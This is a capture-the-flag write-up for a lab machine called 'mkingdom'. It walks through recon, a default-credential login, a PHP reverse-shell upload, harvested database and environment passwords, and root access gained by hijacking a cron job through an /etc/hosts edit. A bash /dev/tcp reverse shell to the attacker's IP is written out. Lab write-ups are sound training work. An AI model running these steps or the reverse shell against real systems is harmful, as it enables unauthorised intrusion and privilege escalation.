mkingdom -- 3-Dec-2024


---- Recon

-- Nmap Scan
┌──(kali㉿kali)-[~]
└─$ nmap -A -T4 mkingdom.thm             
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-02 22:34 EST
Nmap scan report for mkingdom.thm (10.10.207.205)
Host is up (0.16s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
85/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: 0H N0! PWN3D 4G4IN

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.84 seconds

-- Website 
http://mkingdom.thm:85

┌──(kali㉿kali)-[~]
└─$ curl http://mkingdom.thm:85          
<!DOCTYPE html>
<html>
<head>
  <title>0H N0! PWN3D 4G4IN</title>
  <style>
    body {
      background-color: black;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      margin: 0;
      padding: 0;
    }

    .content {
      text-align: center;
    }

    .text {
      color: white;
      font-size: 24px;
      margin-top: 20px;
    }
  </style>
</head>
<body>
  <div class="content">
    <img src="img1.jpg" alt="Image 1" style="max-width: 60%; max-height: 60%; display: block; margin: 0 auto;">
    <p class="text">Bwa, ha, ha, pathetic, you'll never learn!</p>
  </div>
</body>
</html>

Nothing Interesting in Source Code 

-- FFUF Directory brute forcing

┌──(kali㉿kali)-[~]
└─$ ffuf -u http://mkingdom.thm:85/FUZZ -w /usr/share/wordlists/dirb/big.txt 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://mkingdom.thm:85/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/big.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

.htaccess               [Status: 403, Size: 288, Words: 21, Lines: 11, Duration: 2316ms]
.htpasswd               [Status: 403, Size: 288, Words: 21, Lines: 11, Duration: 3320ms]
app                     [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 179ms]
server-status           [Status: 403, Size: 292, Words: 21, Lines: 11, Duration: 174ms]
:: Progress: [20469/20469] :: Job [1/1] :: 242 req/sec :: Duration: [0:01:29] :: Errors: 0 ::

Visting /app directory it redirect - http://mkingdom.thm:85/app/castle/

After surfing found an login page , trying admin:password work

File manager appear there is option of file uploading trying PHP reverse shell 

In system and setting -> Allow file types -> Allow PHP extension then got reverse shell

cat /etc/hosts | sed 's/127\.0\.1\.1\tmkingdom\.thm/10\.8\.6\.102\t\tmkingdom.thm/g' > /tmp/replace_hosts


---- Privilege Escalation   

-- www-data to toad

FOund user password in config file

$ pwd
/var/www/html/app
$ ls -al
total 16
drwxr-xr-x 3 root root 4096 Nov 29  2023 .
drwxr-xr-x 3 root root 4096 Nov 29  2023 ..
drwxrwxr-x 6 root root 4096 Oct  2  2019 castle
-rw-r--r-- 1 root root  871 Nov 28  2023 index.html
$ cd ..
$ ls -al
total 48
drwxr-xr-x 3 root root  4096 Nov 29  2023 .
drwxr-xr-x 3 root root  4096 Jun  7  2023 ..
drwxr-xr-x 3 root root  4096 Nov 29  2023 app
-rw-r--r-- 1 root root 31605 Jun  8  2023 img1.jpg
-rw-r--r-- 1 root root   647 Nov 28  2023 index.html
$ cd app/castle
$ ls -al
total 312
drwxrwxr-x  6 root root   4096 Oct  2  2019 .
drwxr-xr-x  3 root root   4096 Nov 29  2023 ..
-rw-rw-r--  1 root root   1085 Oct  2  2019 LICENSE.TXT
drwxrwxr-x 19 root root   4096 Nov 29  2023 application
-rw-rw-r--  1 root root   1913 Oct  2  2019 composer.json
-rw-rw-r--  1 root root 276690 Oct  2  2019 composer.lock
drwxrwxr-x 23 root root   4096 Oct  2  2019 concrete
-rw-rw-r--  1 root root     42 Oct  2  2019 index.php
drwxrwxrwx  2 root root   4096 Oct  2  2019 packages
-rw-rw-r--  1 root root    532 Oct  2  2019 robots.txt
drwxrwxr-x  2 root root   4096 Oct  2  2019 updates
$ cd application
$ ls -al
total 80
drwxrwxr-x 19 root root 4096 Nov 29  2023 .
drwxrwxr-x  6 root root 4096 Oct  2  2019 ..
drwxrwxr-x  2 root root 4096 Oct  2  2019 attributes
drwxrwxr-x  2 root root 4096 Oct  2  2019 authentication
drwxrwxr-x  2 root root 4096 Oct  2  2019 blocks
drwxrwxr-x  2 root root 4096 Oct  2  2019 bootstrap
drwxrwxrwx  4 root root 4096 Nov 29  2023 config
drwxrwxr-x  2 root root 4096 Oct  2  2019 controllers
-rw-r--r--  1 root root  129 Nov 29  2023 counter.sh
drwxrwxr-x  2 root root 4096 Oct  2  2019 elements
drwxrwxrwx 32 root root 4096 Dec  2 23:02 files
-rw-rw-r--  1 root root    0 Oct  2  2019 index.html
drwxrwxr-x  2 root root 4096 Oct  2  2019 jobs
drwxrwxr-x  2 root root 4096 Oct  2  2019 languages
drwxrwxr-x  2 root root 4096 Oct  2  2019 mail
drwxrwxr-x  2 root root 4096 Oct  2  2019 page_templates
drwxrwxr-x  2 root root 4096 Oct  2  2019 single_pages
drwxrwxr-x  2 root root 4096 Oct  2  2019 src
drwxrwxr-x  2 root root 4096 Oct  2  2019 themes
drwxrwxr-x  2 root root 4096 Oct  2  2019 tools
drwxrwxr-x  2 root root 4096 Oct  2  2019 views
$ cd config
$ ls -al
total 24
drwxrwxrwx  4 root     root     4096 Nov 29  2023 .
drwxrwxr-x 19 root     root     4096 Nov 29  2023 ..
-rw-rw-rw-  1 www-data www-data   19 Nov 29  2023 app.php
-rw-rw-rw-  1 www-data www-data  401 Nov 29  2023 database.php
drwxr-xr-x  3 www-data www-data 4096 Nov 29  2023 doctrine
drwxr-xr-x  2 www-data www-data 4096 Dec  2 23:15 generated_overrides
$ cat database.php
<?php

return [
    'default-connection' => 'concrete',
    'connections' => [
        'concrete' => [
            'driver' => 'c5_pdo_mysql',
            'server' => 'localhost',
            'database' => 'mKingdom',
            'username' => 'toad',
            'password' => 'toadisthebest',
            'character_set' => 'utf8',
            'collation' => 'utf8_unicode_ci',
        ],
    ],
];

Not get user flag 

-- toad to mario

From environment variable after dcoding found password
toad@mkingdom:~$ env
env
APACHE_PID_FILE=/var/run/apache2/apache2.pid
XDG_SESSION_ID=c2
SHELL=/bin/bash
APACHE_RUN_USER=www-data
OLDPWD=/var/www/html/app/castle/application/config
USER=toad
LS_COLORS=
PWD_token=aWthVGVOVEFOdEVTCg==
MAIL=/var/mail/toad
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
APACHE_LOG_DIR=/var/log/apache2
PWD=/home/toad
LANG=en_US.UTF-8
APACHE_RUN_GROUP=www-data
HOME=/home/toad
SHLVL=2
LOGNAME=toad
LESSOPEN=| /usr/bin/lesspipe %s
XDG_RUNTIME_DIR=/run/user/1002
APACHE_RUN_DIR=/var/run/apache2
APACHE_LOCK_DIR=/var/lock/apache2
LESSCLOSE=/usr/bin/lesspipe %s %s
_=/usr/bin/env
toad@mkingdom:~$ su mario                   
su mario
Password: ikaTeNTANtES

mario@mkingdom:/home/toad$ ls
ls
ls: cannot open directory .: Permission denied
mario@mkingdom:/home/toad$ cd /home/mario
cd /home/mario
mario@mkingdom:~$ ls
ls
Desktop    Downloads  Pictures  Templates  Videos
Documents  Music      Public    user.txt
mario@mkingdom:~$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
mario@mkingdom:~$ ls -al
ls -al
total 96
drwx------ 15 mario mario 4096 Jan 29  2024 .
drwxr-xr-x  4 root  root  4096 Jun  9  2023 ..
lrwxrwxrwx  1 mario mario    9 Jun  9  2023 .bash_history -> /dev/null
-rw-r--r--  1 mario mario  220 Jun  7  2023 .bash_logout
-rw-r--r--  1 mario mario 3637 Jun  7  2023 .bashrc
drwx------ 11 mario mario 4096 Jan 26  2024 .cache
drwx------  3 mario mario 4096 Jan 29  2024 .compiz
drwx------ 14 mario mario 4096 Jan 26  2024 .config
drwxr-xr-x  2 mario mario 4096 Jan 26  2024 Desktop
-rw-r--r--  1 mario mario   25 Jan 26  2024 .dmrc
drwxr-xr-x  2 mario mario 4096 Jan 26  2024 Documents
drwxr-xr-x  2 mario mario 4096 Jan 26  2024 Downloads
drwx------  3 mario mario 4096 Jan 29  2024 .gconf
-rw-------  1 mario mario 1026 Jan 29  2024 .ICEauthority
drwx------  3 mario mario 4096 Jan 26  2024 .local
drwxr-xr-x  2 mario mario 4096 Jan 26  2024 Music
drwxr-xr-x  2 mario mario 4096 Jan 26  2024 Pictures
-rw-r--r--  1 mario mario  675 Jun  7  2023 .profile
drwxr-xr-x  2 mario mario 4096 Jan 26  2024 Public
drwxr-xr-x  2 mario mario 4096 Jan 26  2024 Templates
-rw-r--r--  1 root  root    38 Nov 27  2023 user.txt
drwxr-xr-x  2 mario mario 4096 Jan 26  2024 Videos
-rw-------  1 mario mario   57 Jan 29  2024 .Xauthority
-rw-------  1 mario mario 1581 Jan 29  2024 .xsession-errors
-rw-------  1 mario mario  805 Jan 26  2024 .xsession-errors.old
mario@mkingdom:~$ cp user.txt /tmp/user.txt
cp user.txt /tmp/user.txt
mario@mkingdom:~$ cd /tmp
cd /tmp
mario@mkingdom:/tmp$ ls
ls
user.txt
mario@mkingdom:/tmp$ cat user.txt
cat user.txt
thm{030a769febb1b3291da1375234b84283}

-- mario to root

Found a cron job using pysp64 which take file from /app/castle/applications/counter.sh and trigger from mkingdom

change mkingdom to local Ip in /etc/host and create same file structure counter.sh reverse shell for root
when cron job start it take my file and run it got root reverse shell

mario@mkingdom:~$ cp /etc/hosts /tmp/hosts.bak
cp /etc/hosts /tmp/hosts.bak
mario@mkingdom:~$ cd /tmp
cd /tmp
mario@mkingdom:/tmp$ cat /etc/hosts | sed 's/127\.0\.1\.1\tmkingdom\.thm/10\.8\.6\.102\t\tmkingdom.thm/g' > /tmp/replace_hosts
<1\.1\tmkingdom\.thm/10\.8\.6\.102\t\tmkingdom.thm/g' > /tmp/replace_hosts   
mario@mkingdom:/tmp$ ls  
ls
hosts.bak  replace_hosts  user.txt

mario@mkingdom:/tmp$ cat /tmp/replace_hosts > /etc/hosts


┌──(kali㉿kali)-[~/app/castle/application]
└─$ cat counter.sh       
#!/bin/bash
bash -i >& /dev/tcp/10.8.6.102/8080 0>&1
                                                                                                                                              
┌──(kali㉿kali)-[~/app/castle/application]
└─$ cd /home/kali                              
                                                                                                                                              
┌──(kali㉿kali)-[~]
└─$ sudo python3 -m http.server 85        
Serving HTTP on 0.0.0.0 port 85 (http://0.0.0.0:85/) ...
10.10.207.205 - - [02/Dec/2024 23:48:55] "GET /app/castle/application/counter.sh HTTP/1.1" 200 -
10.10.207.205 - - [02/Dec/2024 23:49:55] "GET /app/castle/application/counter.sh HTTP/1.1" 200 -

┌──(kali㉿kali)-[~]
└─$ nc -lvp 8080
listening on [any] 8080 ...
connect to [10.8.6.102] from mkingdom.thm [10.10.207.205] 34098
bash: cannot set terminal process group (2989): Inappropriate ioctl for device
bash: no job control in this shell
root@mkingdom:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@mkingdom:~# cd /root
ccd /root
root@mkingdom:~#cat root.txt
cat root.txt
cat: root.txt: Permission denied
root@mkingdom:~# ls -al
ls -al
total 36
drwx------  3 root root 4096 Nov 29  2023 .
drwxr-xr-x 23 root root 4096 Jun  7  2023 ..
lrwxrwxrwx  1 root root    9 Nov 27  2023 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Feb 19  2014 .bashrc
-rw-r--r--  1 root root  131 Nov 28  2023 counter.sh
-rw-------  1 root root  637 Nov 29  2023 .mysql_history
drwxr-xr-x  2 root root 4096 Nov 26  2023 .pip
-rw-r--r--  1 root root  140 Feb 19  2014 .profile
-rw-r--r--  1 root root   38 Nov 27  2023 root.txt
-rw-r--r--  1 root root   66 Nov 25  2023 .selected_editor

┌──(kali㉿kali)-[~]
└─$ cat root.txt                         
thm{e8b2f52d88b9930503cc16ef48775df0}

Got R00ted!! 

Easy and do it without help  





